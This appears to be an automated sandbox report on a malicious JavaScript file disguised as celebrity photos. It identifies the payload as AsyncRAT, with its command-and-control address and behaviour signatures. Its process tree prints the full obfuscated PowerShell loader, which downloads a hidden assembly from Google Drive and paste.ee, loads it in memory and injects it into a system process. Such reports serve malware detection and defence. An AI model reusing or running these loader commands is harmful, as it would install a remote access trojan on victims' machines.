Analysis

  • max time kernel
    69s
  • max time network
    92s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-10-2024 01:56

General

  • Target

    Lana_Rhoades_Photoos.js

  • Size

    548KB

  • MD5

    ae498935d8a61b3008bd9393a2306dec

  • SHA1

    b1858655d705e14c01cec8d008c3f3db0a09807b

  • SHA256

    401f183d5553d4f01ff3a4df33524f39faa6138f40afb570300ae41ca31efc08

  • SHA512

    8d9830e5ff3f09099ac1e1af2a585cad2a2ad287b75117741d5f940dc2dd934e7046d17881c93b0398917d1f42a9208ab17bede62a594b1a12997d2bba660a8b

  • SSDEEP

    3072:0F8F8F8F8F8F8F8F8F8F8F8F8F8FjFoFoFoFoFoFoFoFoFoFoFoFoFoFoFoFoFod:X7HlvYPobr777lvrFI

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Extracted

Family

asyncrat

Version

1.0.7

Botnet

CEZER

C2

148.113.165.11:3236

Mutex

eqwe2131ewqeqwe

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Lana_Rhoades_Photoos.js
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1004
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SQBFAFgAKAAgACgAKAAnAFQAMgBIAGkAbQBhAGcAZQBVAHIAbAAgAD0AIABaADQAUwBoAHQAdABwAHMAOgAvAC8AZAByAGkAdgBlAC4AZwBvAG8AZwBsAGUALgBjAG8AbQAvAHUAYwA/AGUAeABwAG8AcgB0AD0AZABvAHcAbgBsAG8AYQBkACYAaQBkAD0AMQBBAEkAVgBnAEoASgBKAHYAMQBGADYAdgBTADQAcwBVAE8AeQBiAG4ASAAtAHMARAB2AFUAJwArACcAaABCAFkAdwB1AHIAIABaADQAUwA7AFQAMgBIAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgACcAKwAnAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQAnACsAJwBuAHQAOwBUADIASABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgAFQAMgAnACsAJwBIAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKABUADIASABpAG0AYQBnAGUAVQByAGwAKQA7AFQAMgBIAGkAbQBhACcAKwAnAGcAZQBUAGUAeAAnACsAJwB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAJwArACcAcgBpAG4AZwAoAFQAMgBIAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7AFQAMgBIAHMAdABhAHIAdABGAGwAYQBnACAAPQAgAFoANABTADwAPABCAEEAUwBFADYANABfAFMAJwArACcAVABBAFIAVAA+AD4AWgA0AFMAOwAnACsAJwBUADIASABlAG4AZABGAGwAYQBnACAAPQAgAFoANABTADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgBaACcAKwAnADQAJwArACcAUwA7AFQAMgBIAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAVAAyAEgAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAVAAyAEgAcwB0AGEAcgB0AEYAbABhAGcAKQA7AFQAMgBIAGUAbgBkAEkAbgBkACcAKwAnAGUAeAAgAD0AIABUADIASABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkACcAKwAnAGUAeABPAGYAKABUADIASABlAG4AZABGAGwAYQBnACkAOwBUADIASABzAHQAYQByAHQASQBuAGQAZQB4ACAALQAnACsAJwBnAGUAIAAwACAALQBhAG4AZAAgAFQAMgBIAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAVAAyAEgAcwB0AGEAcgB0AEkAbgBkACcAKwAnAGUAeAA7AFQAMgBIAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAnACsAJwBUADIASABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAVAAyAEgAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACcAKwAnACAAVAAyAEgAZQBuAGQASQBuAGQAZQB4ACAALQAgAFQAMgBIAHMAdABhAHIAdABJAG4AZABlAHgAOwBUADIASABiAGEAcwAnACsAJwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgAFQAMgBIAGkAbQBhAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKABUADIASABzAHQAYQByAHQASQBuAGQAZQB4ACwAIABUADIASABiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsAVAAyAEgAYgBhAHMAZQA2ADQAUgBlAHYAZQByAHMAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAVAAyAEgAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuACcAKwAnAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIABWAEcAcQAgAEYAbwAnACsAJwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIABUADIASABfACAAfQApAFsALQAnACsAJwAxACcAKwAnAC4ALgAtACgAVAAyAEgAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuAEwAZQBuAGcAdABoACkAXQA7AFQAMgBIAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0AJwArACcALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAJwArACcAaQBuAGcAKABUADIASABiAGEAcwBlADYANABSAGUAdgBlACcAKwAnAHIAcwBlAGQAKQA7AFQAMgBIAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAJwArACcAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAVAAyAEgAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7AFQAMgBIAHYAYQBpAE0AZQB0AGgAbwBkACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQAnACsAJwBdAC4ARwBlAHQATQBlAHQAaABvAGQAKABaADQAUwBWAEEASQBaADQAUwApADsAVAAyAEgAdgBhAGkATQBlAHQAaABvAGQALgBJAG4AdgAnACsAJwBvAGsAZQAoAFQAMgBIAG4AdQBsAGwALAAgAEAAKABaADQAUwAwAC8ANABLAHoAJwArACcAegB1AC8AZAAvAGUAZQAuAGUAdABzAGEAcAAvAC8AOgBzAHAAdAB0AGgAWgA0AFMAJwArACcALAAgAFoANABTAGQAZQBzAGEAdABpAHYAYQBkAG8AWgA0AFMALAAgAFoANABTAGQAZQBzAGEAdABpAHYAYQBkAG8AWgA0AFMALAAgAFoANABTAGQAZQBzAGEAdABpAHYAYQBkAG8AWgA0AFMALAAgAFoANABTAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzADMAMgBaADQAJwArACcAUwAsACAAWgA0AFMAZABlAHMAYQB0AGkAdgBhAGQAbwBaADQAUwAsACAAWgA0AFMAZABlAHMAYQB0ACcAKwAnAGkAdgBhAGQAbwBaADQAUwAnACsAJwAsAFoANABTAGQAJwArACcAZQAnACsAJwBzAGEAdABpAHYAYQAnACsAJwBkAG8AWgA0AFMALABaADQAJwArACcAUwBkAGUAcwBhAHQAaQB2AGEAZABvAFoANABTACwAWgA0AFMAZABlAHMAYQB0AGkAdgBhAGQAJwArACcAbwBaADQAUwAsAFoANABTAGQAZQBzAGEAdABpAHYAYQBkAG8AWgA0AFMALABaADQAUwBkAGUAcwBhAHQAaQB2AGEAZABvAFoANABTACwAWgA0AFMAMQBaADQAUwAsAFoANABTAGQAZQBzAGEAdABpAHYAYQBkAG8AWgA0AFMAKQApADsAJwApACAALQBDAHIAZQBQAGwAYQBDAEUAIAAgACcAVAAyAEgAJwAsAFsAQwBoAGEAUgBdADMANgAtAFIAZQBQAGwAQQBjAEUAIAAgACcAWgA0AFMAJwAsAFsAQwBoAGEAUgBdADMAOQAgAC0AQwByAGUAUABsAGEAQwBFACcAVgBHAHEAJwAsAFsAQwBoAGEAUgBdADEAMgA0ACkAKQA=';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1924
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "IEX( (('T2HimageUrl = Z4Shttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur Z4S;T2HwebClient = '+'New-Object System.Net.WebClie'+'nt;T2HimageBytes = T2'+'HwebClient.DownloadData(T2HimageUrl);T2Hima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetSt'+'ring(T2HimageBytes);T2HstartFlag = Z4S<<BASE64_S'+'TART>>Z4S;'+'T2HendFlag = Z4S<<BASE64_END>>Z'+'4'+'S;T2HstartIndex = T2HimageText.IndexOf(T2HstartFlag);T2HendInd'+'ex = T2HimageText.Ind'+'exOf(T2HendFlag);T2HstartIndex -'+'ge 0 -and T2HendIndex -gt T2HstartInd'+'ex;T2HstartIndex += '+'T2HstartFlag.Length;T2Hbase64Length ='+' T2HendIndex - T2HstartIndex;T2Hbas'+'e64Command = T2HimageText.Substring(T2HstartIndex, T2Hbase64Length);T2Hbase64Reversed = -join (T2Hbase64Command.'+'ToCharArray() VGq Fo'+'rEach-Object { T2H_ })[-'+'1'+'..-(T2Hbase64Command.Length)];T2HcommandBytes = [System'+'.Convert]::FromBase64Str'+'ing(T2Hbase64Reve'+'rsed);T2HloadedAssembly = [System.Reflection.Asse'+'mbly]::Load(T2HcommandBytes);T2HvaiMethod = [dnlib.IO.Home'+'].GetMethod(Z4SVAIZ4S);T2HvaiMethod.Inv'+'oke(T2Hnull, @(Z4S0/4Kz'+'zu/d/ee.etsap//:sptthZ4S'+', Z4SdesativadoZ4S, Z4SdesativadoZ4S, Z4SdesativadoZ4S, Z4SAddInProcess32Z4'+'S, Z4SdesativadoZ4S, Z4Sdesat'+'ivadoZ4S'+',Z4Sd'+'e'+'sativa'+'doZ4S,Z4'+'SdesativadoZ4S,Z4Sdesativad'+'oZ4S,Z4SdesativadoZ4S,Z4SdesativadoZ4S,Z4S1Z4S,Z4SdesativadoZ4S));') -CrePlaCE 'T2H',[ChaR]36-RePlAcE 'Z4S',[ChaR]39 -CrePlaCE'VGq',[ChaR]124))"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4988
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:2256

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    f41839a3fe2888c8b3050197bc9a0a05

    SHA1

    0798941aaf7a53a11ea9ed589752890aee069729

    SHA256

    224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

    SHA512

    2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    64B

    MD5

    235a8eb126d835efb2e253459ab8b089

    SHA1

    293fbf68e6726a5a230c3a42624c01899e35a89f

    SHA256

    5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686

    SHA512

    a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wtev1fnm.ud1.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1924-1-0x00000232FBFF0000-0x00000232FC012000-memory.dmp

    Filesize

    136KB

  • memory/1924-11-0x00007FFBF1D30000-0x00007FFBF27F1000-memory.dmp

    Filesize

    10.8MB

  • memory/1924-12-0x00007FFBF1D30000-0x00007FFBF27F1000-memory.dmp

    Filesize

    10.8MB

  • memory/1924-22-0x00007FFBF1D33000-0x00007FFBF1D35000-memory.dmp

    Filesize

    8KB

  • memory/1924-23-0x00007FFBF1D30000-0x00007FFBF27F1000-memory.dmp

    Filesize

    10.8MB

  • memory/1924-31-0x00007FFBF1D30000-0x00007FFBF27F1000-memory.dmp

    Filesize

    10.8MB

  • memory/1924-0-0x00007FFBF1D33000-0x00007FFBF1D35000-memory.dmp

    Filesize

    8KB

  • memory/2256-25-0x0000000000400000-0x0000000000412000-memory.dmp

    Filesize

    72KB

  • memory/2256-34-0x0000000005860000-0x00000000058FC000-memory.dmp

    Filesize

    624KB

  • memory/2256-35-0x0000000005EB0000-0x0000000006454000-memory.dmp

    Filesize

    5.6MB

  • memory/2256-36-0x0000000005970000-0x00000000059D6000-memory.dmp

    Filesize

    408KB

  • memory/2256-37-0x0000000006920000-0x0000000006996000-memory.dmp

    Filesize

    472KB

  • memory/2256-38-0x0000000005AE0000-0x0000000005AF0000-memory.dmp

    Filesize

    64KB

  • memory/2256-39-0x00000000068C0000-0x00000000068DE000-memory.dmp

    Filesize

    120KB

  • memory/2256-40-0x0000000006A50000-0x0000000006AE2000-memory.dmp

    Filesize

    584KB

  • memory/4988-24-0x00000150E5F30000-0x00000150E608A000-memory.dmp

    Filesize

    1.4MB